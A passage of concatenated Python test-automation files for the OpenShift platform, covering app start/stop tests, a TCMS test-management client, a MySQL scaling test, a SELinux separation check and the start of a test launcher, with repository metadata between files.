expect_return=0,\n expect_string_list=[\"%s stopped\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Stop this app again\",\n \"rhc app stop %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be stopped successfully\",\n expect_return=0,\n expect_string_list=[\"%s stopped\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is NOT available\",\n verify,\n function_parameters=[self.bad_str],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Start this app\",\n \"rhc app start %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be started successfully\",\n expect_return=0,\n expect_string_list=[\"%s started\" % (self.app_name)],\n try_count=3)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0,\n try_count=10,\n try_interval=12)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Restart this app\",\n \"rhc app restart %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be restarted successfully\",\n expect_return=0,\n expect_string_list=[\"%s restarted\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = 
testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0,\n try_count=10,\n try_interval=12)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Force stop this app\",\n \"rhc app force-stop %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be force stopped successfully\",\n expect_return=0,\n expect_string_list=[\"%s force stopped\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is NOT available\",\n verify,\n function_parameters=[self.bad_str],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Restart this app\",\n \"rhc app restart %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be restarted successfully\",\n expect_return=0,\n expect_string_list=[\"%s restarted\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n expect_return=0,\n function_parameters=[self.good_str],\n try_count=10,\n try_interval=12)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Reload this app\",\n \"rhc app reload %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be reloaded successfully\",\n expect_return=0,\n expect_string_list=[\"%s config reloaded\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app's status\",\n \"rhc app show --state %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Delete this app\",\n common.destroy_app,\n function_parameters=[self.app_name, self.user_email, self.user_passwd],\n expect_description=\"The app should be deleted successfully\",\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Try to start this non-existing app\",\n \"rhc app start %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\")\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"Control %s application - start/restart/reload/stop/destroy/force-stop\" %(self.app_type), self.steps_list)\n\n try:\n case.run()\n except testcase.TestCaseStepFail as e:\n return self.failed(str(e))\n\n if case.testcase_status == 'PASSED':\n return self.passed()\n if case.testcase_status == 'FAILED':\n return self.failed()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateControlApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.5712647438049316, "alphanum_fraction": 0.5834193229675293, "avg_line_length": 40.13679122924805, "blob_id": "98f28ef7b407ce7fa89f8fa9d945a5d58ae33b22", "content_id": "da83c013917e70e0337bfdd29f8165a6daa898ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8721, "license_type": "no_license", 
"max_line_length": 364, "num_lines": 212, "path": "/automation/open/lib/tcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# [email protected]\n# [email protected]\n# 2012-01-05\n#\n\n#for XMLRPC check this site:\n#https://tcms.engineering.redhat.com/xmlrpc/\nimport nitrate\nfrom kerberos import GSSError\nimport clog\n\nrhtest_disposition_to_tcms_mapping = {'COMPLETED':'PAUSED', 'PASSED':'PASSED', 'FAILED':'FAILED', 'ABORT':'ERROR', 'SKIP':'WAIVED', 'INCOMPLETE' :'ERROR'}\n\nTEST_RUN_STATUS = {'RUNNING' : 0, 'FINISHED' : 1}\nCASE_RUN_STATUS = {'IDLE':1,'PASSED':2,'FAILED':3, 'RUNNING':4, 'PAUSED':5, 'BLOCKED':6,'ERROR':7, 'WAIVED':8}\n#tag_id_name_map = [{'id': 513, 'name': 'acceptance'}, {'id': 1310, 'name': 'rhc-cartridge'}, {'id': 1859, 'name': 'non_site'}, {'id': 1860, 'name': 'devenv'}, {'id': 1876, 'name': 'cartridge'}, {'id': 1882, 'name': 'standalone'}, {'id': 1785, 'name': 'sprint6'}, {'id': 1958, 'name': 'fedoraenv'}, {'id': 2082, 'name': 'fwtest5'}, {'id': 2087, 'name': 'fwtest6'}]\n\nclass TCMS(object):\n \"\"\"\n Base object for initializing connection to XML RPC\n \"\"\"\n def __init__(self, xmlrpc_obj=None):\n self.log = clog.get_logger()\n if xmlrpc_obj is None:\n try:\n self.conn = nitrate.NitrateKerbXmlrpc('https://tcms.engineering.redhat.com/xmlrpc/')\n self.conn.get_me()\n self.server = self.conn.server\n except nitrate.NitrateXmlrpcError as e:\n self.log.error(\"Unable to connect via XMLRPC service: %s\"%str(e))\n raise e\n except GSSError as e:\n self.log.error(\"Invalid kerberos ticket or hostname: %s\"%str(e))\n raise e\n #server_url = \"https://\"+LOGIN+\":\"+PASSWORD+'@'+XMLRPC_URL;\n #Create an object to represent our server.\n #self.server = xmlrpclib.ServerProxy(server_url);\n else:\n self.server = xmlrpc_obj\n\n\n def update_testcaserun_status(self, testcaserun_id, status):\n self.log.debug(\"Updating TestCaseRun - %s Status to %s ...\" %(testcaserun_id, status))\n return self.server.TestCaseRun.update([testcaserun_id], {'case_run_status' : CASE_RUN_STATUS[status]})\n\n def update_testcaserun_notes(self, testcaserun_id, notes):\n self.log.debug(\"Updating TestCaseRun Notes ...\")\n return self.server.TestCaseRun.update([testcaserun_id], {'notes' : notes})\n\n def update_testcaserun_testlog(self, testcaserun_id, name, url):\n self.log.debug(\"Updating TestCaseRun Comments ...\")\n return self.server.TestCaseRun.attach_log(testcaserun_id, name, url)\n\n def update_testcaserun_comments(self, testcaserun_id, comments):\n self.log.debug(\"Updating TestCaseRun Comments ...\")\n return self.server.TestCaseRun.add_comment(testcaserun_id, comments)\n\n def update_testcaserun(self, testcaserun_id, params):\n return self.server.TestCaseRun.update([testcaserun_id], params)\n\n\n def create_testrun(self,summary=None, build=1770, plan_id=4962, manager_id=2351, product=292, product_version=1212, status=0):\n \n self.testrun_values = {\n 'build' : build,\n 'plan' : plan_id,\n 'manager': manager_id,\n 'summary': summary,\n 'product': product,\n 'product_version' : product_version,\n 'status': status,\n }\n try:\n self.log.debug(\"Creating Test Run ...\")\n testrun = self.server.TestRun.create(self.testrun_values)\n self.testrun_id = testrun['run_id']\n self.log.info(\"TCMS Test Run - https://tcms.engineering.redhat.com/run/%s/ was sucessfully created.\" %(self.testrun_id))\n return testrun\n except Exception as e:\n raise TCMSException(\"ERROR[TCMS]: Couldn't create TestRun(%s) :: %s\" %(str(self.testrun_values), str(e)) )\n\n\n def 
get_testrun(self, testrun_id):\n try:\n return self.server.TestRun.get(testrun_id)\n except:\n raise TCMSException(\"ERROR[TCMS]: Test run %s does not exist\" % str(testrun_id))\n\n\n def add_testcase_to_run(self, testcase_id, testrun_id):\n self.log.debug(\"Adding test case with id - %s to test run %s\" %(testcase_id, testrun_id))\n try:\n self.server.TestCase.add_to_run(testcase_id, testrun_id) \n except Exception as e:\n self.log.warning(\"Duplicate entry attempted: Testcase %s already added to test run %s\" % (testcase_id, testrun_id))\n\n\n def get_testcase_from_run(self, testrun_id):\n try:\n return self.server.TestRun.get_test_cases(testrun_id)\n except:\n raise TCMSException(\"ERROR[TCMS': Failed to get testcases for testrun %s\" % str(testrun_id))\n\n get_testcase_by_run_id = get_testcase_from_run\n\n def reset_testrun(self, testrun_id, status=[]):\n \"\"\"\n Set all (if status==None) caseruns' status to IDLE\n \"\"\"\n testrun_cases = self.get_testcaseruns(testrun_id)\n caseruns2update = []\n for tcrun in testrun_cases:\n if status == None or len(status)==0 or tcrun['case_run_status'] in status:\n caseruns2update.append(tcrun['case_run_id'])\n try:\n self.server.TestCaseRun.update(caseruns2update, {'case_run_status': 1}) #1-IDLE\n except Exception as e:\n raise TCMSException(\"Unable to reset testrun[%s]: %s\" %(testrun_id, str(e)))\n\n def get_testcaseruns(self, testrun_id):\n try:\n return self.server.TestRun.get_test_case_runs(testrun_id, 0)\n except Exception as e:\n raise TCMSException(\"Unable to fetch testcaseruns from DB per testrun[%s]: %s\" %(testrun_id, str(e)))\n\n def get_testcaserun(self, testcase_id, testrun_id, build=None):\n if not build:\n build = self.get_testrun(testrun_id)[\"build_id\"]\n try:\n return self.server.TestCaseRun.get_s(testcase_id, testrun_id, build)\n except Exception as e:\n raise TCMSException(\"Test case not in this test run %d\" % testrun_id)\n\n def get_testcaserun_by_id(self, testcaserun_id):\n return self.server.TestCaseRun.get(testcaserun_id)\n\n\n def get_testcases(self, filter=None, plain_id='4962'):\n filter['is_automated'] = 1\n filter['plan__plan_id'] = plain_id\n filter['case_status'] = 2 #2-#CONFIRMED\n\n testcases = self.server.TestCase.filter(filter)\n if len(testcases) == 0 :\n raise TCMSException(\"ERROR[TCMS] : No test cases to run with filter %s\" % str(filter))\n return testcases\n\n def get_tag_id(self, tag_name):\n if isinstance(tag_name, str):\n try:\n return int(self.server.Tag.get_tags({'names':[tag_name]})[0]['id'])\n except Exception as e:\n self.log.error(str(e))\n return None\n elif isinstance(tag_name, list) or isinstance(tag_name, tuple):\n try:\n return map(lambda x: x['id'], self.server.Tag.get_tags({'names':tag_name}))\n except Exception as e:\n self.log.error(str(e))\n return None\n else:\n return None\n\n def get_testcase_id_list_by_tag(self, testcase_tag_list, plan_id=4962):\n self.log.debug(\"Geting test cases taged by %s\" %(testcase_tag_list))\n try:\n tag_id_list = [ i['id'] for i in self.server.Tag.get_tags({'names': testcase_tag_list}) ]\n \"\"\"\n tag_id_list = []\n # TCMS bug - 808691, so here I must use hard code - tag_id_name_map:.\n for i in testcase_tag_list:\n for j in tag_id_name_map:\n if i == j[\"name\"]:\n tag_id_list.append(j[\"id\"])\n break\n \"\"\"\n filter = {\n 'plan': plan_id,\n 'tag__in': tag_id_list}\n #print filter\n tc_list = self.get_testcases(filter)\n tc_id_list = []\n for tc in tc_list:\n tc_id_list.append(tc[\"case_id\"])\n return tc_id_list\n except Exception as e:\n 
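# (added clarifying comment) a failed TCMS tag lookup is only logged below, so the caller silently receives None\n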
            self.log.error(e)\n\n    def add_testcase_to_run_by_tag(self, testcase_tag_list, testrun_id):\n        self.log.debug(\"Adding test cases tagged by %s to test run %s\" %(testcase_tag_list, testrun_id))\n        try:\n            tc_id_list = self.get_testcase_id_list_by_tag(testcase_tag_list)\n            self.add_testcase_to_run(tc_id_list, testrun_id)\n        except Exception as e:\n            self.log.error(e)\n\n    def update_testrun(self, testrun_id, filter):\n        return self.server.TestRun.update([testrun_id], filter)\n\n\n\nclass TCMSException(Exception):\n    def __init__(self, msg):\n        self.msg = msg\n    def __str__(self):\n        return repr(self.msg)\n\n\n\n\nif __name__ == \"__main__\":\n    pass\n" }, { "alpha_fraction": 0.5856850743293762, "alphanum_fraction": 0.5938650369644165, "avg_line_length": 34.780487060546875, "blob_id": "5023e206c68fcea3f703814150a3ca6064f2f4dc", "content_id": "ee41e64996a68d4790c029c2d4f4acf2fa263fbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7335, "license_type": "no_license", "max_line_length": 225, "num_lines": 205, "path": "/automation/open/testmodules/RT/scaling/jbossas_mysql_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.user_email = self.config.OPENSHIFT_user_email\n        self.user_passwd = self.config.OPENSHIFT_user_passwd\n        self.app_name = 'jboss' + common.getRandomString()\n        try:\n            self.app_type = common.app_types[self.get_variant()]\n        except:\n            self.app_type = common.app_types[\"jbossas\"]\n\n        common.env_setup()\n        self.steps_list = []\n\n    def finalize(self):\n        pass\n\n\nclass JbossasMysqlScaling(OpenShiftTest):\n    def check_mysql_result(self):\n        app_url = OSConf.get_app_url(self.app_name)\n        return common.grep_web_page(\"http://%s/mysql_scalable.jsp\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", delay=10, count=12)\n\n    def prepare_jsp_file(self):\n        try:\n            fr = open(\"%s/cartridge/app_template/mysql/mysql_scalable.jsp\"%(WORK_DIR + \"/../\"), \"r\")\n        except Exception as e:\n            print str(e)\n            return False\n        jsp = fr.read()\n        fr.close()\n        try:\n            fw = open(\"%s/src/main/webapp/mysql_scalable.jsp\" %self.app_name, \"w\")\n            fw.write(jsp)\n            fw.close()\n        except Exception as e:\n            self.error(str(e))\n            return False\n\n        try:\n            fw = open(\"%s/pom.xml\"%self.app_name, \"w\")\n            self.info(\"Generate a pom.xml file\")\n            fw.write(\"\"\"<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd\">\n  <modelVersion>4.0.0</modelVersion>\n  <groupId>%s</groupId>\n  <artifactId>%s</artifactId>\n  <packaging>war</packaging>\n  <version>1.0</version>\n  <name>%s</name>\n  <licenses>\n    <license>\n      <name>Apache License, Version 2.0</name>\n      <url>http://www.apache.org/licenses/LICENSE-2.0.html</url>\n    </license>\n  </licenses>\n  <properties>\n    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n  </properties>\n  <dependencies>\n    <dependency>\n      <groupId>org.jboss.spec</groupId>\n      <artifactId>jboss-javaee-6.0</artifactId>\n      <version>1.0.0.Final</version>\n      <type>pom</type>\n      <scope>provided</scope>\n    </dependency>\n    <dependency>\n      <groupId>mysql</groupId>\n      
<artifactId>mysql-connector-java</artifactId>\n <version>5.1.20</version>\n </dependency>\n </dependencies>\n <profiles>\n <profile>\n <!-- When built in OpenShift the 'openshift' profile will be used when invoking mvn. -->\n <!-- Use this profile for any OpenShift specific customization your app will need. -->\n <!-- By default that is to put the resulting archive into the 'deployments' folder. -->\n <!-- http://maven.apache.org/guides/mini/guide-building-for-different-environments.html -->\n <id>openshift</id>\n <build>\n <finalName>%s</finalName>\n <plugins>\n <plugin>\n <artifactId>maven-war-plugin</artifactId>\n <version>2.1.1</version>\n <configuration>\n <outputDirectory>deployments</outputDirectory>\n <warName>ROOT</warName>\n </configuration>\n </plugin>\n </plugins>\n </build>\n </profile>\n </profiles>\n</project>\"\"\" % (self.app_name, self.app_name, self.app_name, self.app_name))\n fw.close()\n except Exception as e:\n self.error(str(e))\n return False\n\n return True\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_scalable_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Prepare template files\",\n self.prepare_jsp_file,\n expect_return = True))\n\n# step = testcase.TestCaseStep(\n# \"update config file\",\n# \"sed -i '/MysqlDS\\\"/ {s/false/true/}' %s/.openshift/config/standalone.xml\" % (self.app_name),\n# expect_return = 0)\n# steps.append(step)\n\n self.steps_list.append(testcase.TestCaseStep(\n \"git push codes\",\n \"cd %s && git add . 
&& git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-donw the application via Rest API\",\n common.scale_down,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_interval=5,\n try_count=6))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0))\n\n case = testcase.TestCase(\"[US2099][US2307][RT][rhc-cartridge]Embed mysql to scalable apps: jbossas, jbosseap\", self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossasMysqlScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6197420358657837, "alphanum_fraction": 0.6270331144332886, "avg_line_length": 27.285715103149414, "blob_id": "e371a01cb6bcf837005f3e36297204ece387b092", "content_id": "718e211dac070bc30e7be135872bb2aff7e48430", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 126, "num_lines": 63, "path": "/automation/open/testmodules/RT/security/selinux_illegal_operations.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\n\nimport os, sys\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.mypath = os.path.abspath(__file__)\n self.mydir = os.path.dirname(__file__)\n self.summary=\"[integration][rhc-selinux]SELinux separation - illegal operations\"\n common.env_setup()\n self.app_name = 'python'\n self.app_type = common.app_types[self.app_name]\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n \n\nclass SelinuxIllegalOperations(OpenShiftTest):\n def test_method(self):\n #\"Create an %s app: %s\" % (self.app_type, self.app_name),\n ret = common.create_app(self.app_name, self.app_type)\n self.assert_equal(ret, 0, \"App should be created successfully\")\n\n #\"Copy template files\",\n ret = common.command_get_status(\"cp -f %s/data/illegal_app_content/* %s/wsgi/\" % (self.mydir, self.app_name))\n 
        self.assert_equal(ret, 0)\n\n        #\"Git push codes\",\n        ret = common.command_get_status(\"cd %s/wsgi/ && git add . && git commit -am 'update app' && git push\" % self.app_name)\n        self.assert_equal(ret, 0)\n\n        #\"Get app URL\",\n        app_url = common.get_app_url_from_user_info(self.app_name)\n\n        #\"Check feedback\",\n        ret = common.grep_web_page(app_url, 'RETURN VALUE:0')\n        self.assert_equal(ret, 1) #the string shouldn't be there\n\n        return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(SelinuxIllegalOperations)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5761477947235107, "alphanum_fraction": 0.6108622550964355, "avg_line_length": 23.12162208557129, "blob_id": "d4371b8baa69394b37f4cc0394295f40112efa68", "content_id": "a3ba3b051456514b0aa8058b6af1c60d518cf5cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1786, "license_type": "no_license", "max_line_length": 124, "num_lines": 74, "path": "/automation/open/testmodules/UI/web/case_174262.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174262.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass CreateRuby1_9App(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login()\n        #web.delete_app(\"ruby19\")\n        #create a ruby1.9 app\n        web.create_app(\"ruby-1.9\",\"ruby19\")\n\n        #check whether the links are correct\n        time.sleep(5)\n        \n        #check the \"appurl\" link\n        web.go_to_app_detail(\"ruby19\")\n        web.click_element_by_xpath('''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n        time.sleep(2)\n        web.assert_text_equal_by_xpath(\"Welcome to OpenShift\",'''//title''') \n        \n        #delete a ruby19 app\n        web.go_to_app_detail(\"ruby19\")\n        time.sleep(2)\n        web.click_element_by_link_text(\"Delete this application\")\n        time.sleep(1)\n        web.click_element_by_name(\"commit\")\n        time.sleep(60)\n        web.go_to_app_detail(\"ruby19\")\n        web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n        self.tearDown()\n\n        return self.passed(\" case_174262--CreateRuby1_9App passed successfully.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(CreateRuby1_9App)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_174262.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6524926424026489, "alphanum_fraction": 0.6539589166641235, "avg_line_length": 33.099998474121094, "blob_id": "2d7882b4fe8c508e8a6264fe2c1a98a16edf7255", "content_id": "a939b8cc2c19c70181573fda4cb2bb795faf50bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1364, "license_type": "no_license", "max_line_length": 149, "num_lines": 40, "path": "/automation/open/bin/update_rhc_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#\n# Helper script 
for updating RHC clients based on OS\n#\n# [email protected]\n#\nimport os\nimport sys\nimport fcntl\nimport setup_client\nfrom optparse import OptionParser\n\n\nif __name__ == \"__main__\":\n parser = OptionParser()\n parser.set_defaults(skip_create_repo=False)\n parser.add_option(\"-b\", \"--branch\", dest=\"branch\", help=\"What branch to use for installation. Options: [stage|candidate].\")\n parser.add_option(\"-r\", \"--release\", dest=\"release\", help=\"What release of rhc client should be used to install. Default is the latest release.\")\n parser.add_option(\"-k\", action=\"store_true\", dest=\"skip_create_repo\", help=\"If skip creating yum repo. Default is False\")\n (options, args) = parser.parse_args()\n\n if not options.branch:\n options.branch = 'candidate'\n\n if os.getuid() == 0:\n need_sudo = \"\"\n else:\n need_sudo = \"sudo\"\n os.system('%s touch /tmp/update_client.lock' % (need_sudo))\n lock_file = file(\"/tmp/update_client.lock\", \"r\")\n try:\n fcntl.flock(lock_file, fcntl.LOCK_EX)\n except IOError, e:\n fcntl.flock(lock_file, fcntl.LOCK_UN)\n print \"Failed to get update client lock\"\n sys.exit(1)\n ret = setup_client.do_setup(options.release, options.branch, options.skip_create_repo)\n fcntl.flock(lock_file, fcntl.LOCK_UN)\n lock_file.close()\n sys.exit(ret)\n" }, { "alpha_fraction": 0.565645694732666, "alphanum_fraction": 0.5718206167221069, "avg_line_length": 43.35869598388672, "blob_id": "e142e063412d195b440664a3af6063b33a2cbacb", "content_id": "ce38a8dc93ff76c618ea9be04a2737d170712688", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20405, "license_type": "no_license", "max_line_length": 263, "num_lines": 460, "path": "/automation/open/bin/launcher.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport time\nimport platform\nimport socket\nimport shutil\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\ntestmodules_path = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path)\nsys.path.append(lib_path + \"/supports\")\nsys.path.append(testmodules_path)\nfrom tcms import TCMS, TCMSException\nfrom helper import *\nimport clog\nimport random\nimport database\nimport json\nimport OSConf\n\ntcmsobj = None\nDEBUG = True \nFROM_DB = False\nRUNDIR = \"%s/../workspace\"%file_path\n(OshiftUser, OshiftPasswd) = get_default_rhlogin()\n\ndef run_tests(testrun_id, tc_id_list=None, skip_tag_ids=None):\n final_testrun_cases = []\n if not FROM_DB:\n testrun_cases = tcmsobj.get_testcase_by_run_id(testrun_id)\n\n #get all testcaseruns for save time\n log.debug(\"Getting all case runs...\")\n testcaserun_hash = dict()\n for caserun in tcmsobj.server.TestRun.get_test_case_runs(testrun_id):\n testcaserun_hash[caserun['case_id']] = caserun\n log.debug(\"Filtering Test Case ...\")\n for i in testrun_cases:\n #case_run = tcmsobj.get_testcaserun(i['case_id'], testrun_id)\n if testcaserun_hash.has_key(i['case_id']):\n i['case_run_id'] = testcaserun_hash[i['case_id']]['case_run_id']\n i['case_run_status'] = testcaserun_hash[i['case_id']]['case_run_status']\n else:\n log.warning(\"SKIP: Unable to find case_run for case[%s]\"%i['case_id'])\n continue\n\n if i['case_status'] != 'CONFIRMED' or int(i['is_automated']) != 1 or i['case_run_status'] != 'IDLE': \n log.info(\"SKIP: Case %s in this run is not CONFIRMED, or AUTOMATED, or its status is not IDLE\" %(i['case_id']))\n else:\n if 
tc_id_list != None and i['case_id'] not in tc_id_list:\n log.info(\"SKIP: Case %s in not in your specified list - %s\" %(i['case_id'], tc_id_list))\n else:\n final_testrun_cases.append(i)\n\n if len(final_testrun_cases) == 0:\n log.info(\"No suitable test for testing!\")\n return 0\n manual_run_tag_id = tcmsobj.get_tag_id('manual_run')\n else:\n ### HERE if we are using MySQL to get the testcases\n final_testrun_cases = []\n for tc_id in tc_id_list:\n testcase = database.get_testcase_by_id(tc_id)\n final_testrun_cases.append(testcase)\n # XXX put back in later\n debug(\"=\" * 80)\n # First of all, will run 142463 case\n log.info(\"Job starts - Creating domain\")\n debug(\"=\" * 80)\n ret = exec_testmodule(\"RT.job_related.create_domain\", rhtest_args=' -R -G ')\n if (ret != 0):\n log.error(\"Unable to create a domain - HALT.\")\n sys.exit(254)\n #do random shuffle sort to avoid parallel conflicts\n random.shuffle(final_testrun_cases)\n if not FROM_DB:\n for tc in final_testrun_cases:\n debug(\"\\n\\n\")\n debug(\"-\" * 80)\n log.info(\"Running case#%s [%s...]\" %(tc['case_id'], tc['summary'][:40]))\n debug(\"-\" * 80)\n try:\n json_data = json.loads(tc['script'])\n script = json_data['python'].strip().split(\".py\")[0]\n except:\n print \"Can't find script...trying again with .py format\"\n script = tc['script'].strip().split(\".py\")[0]\n\n cf_path = \"%s/%s.%s\" %(testmodules_path, script + \".conf\", OshiftUser)\n module_name = \".\".join(script.split(\"/\"))\n if len(script.strip()) == 0 or len(module_name) == 0:\n log.info(\"WARNING: Undefined script in TCMS\")\n continue\n if tc['arguments'] == '':\n tc['arguments'] = None\n\n content = \"\"\"\ntcms_arguments = %s\nscript = '%s'\ntcms_testcase_id = %s\ntcms_testrun_id = %s\ntcms_testcaserun_id = %s\ntcms_testrun_environment = '%s' \n\"\"\" %(tc['arguments'], tc['script'], tc['case_id'], testrun_id, tc['case_run_id'], '___TBD___')\n # Before running, check status again, set it for RUNNING status, also for parallel funcationaliy\n case_run = tcmsobj.get_testcaserun_by_id(tc['case_run_id'])\n if case_run['case_run_status'] == 'IDLE':\n #if a job needs to be run 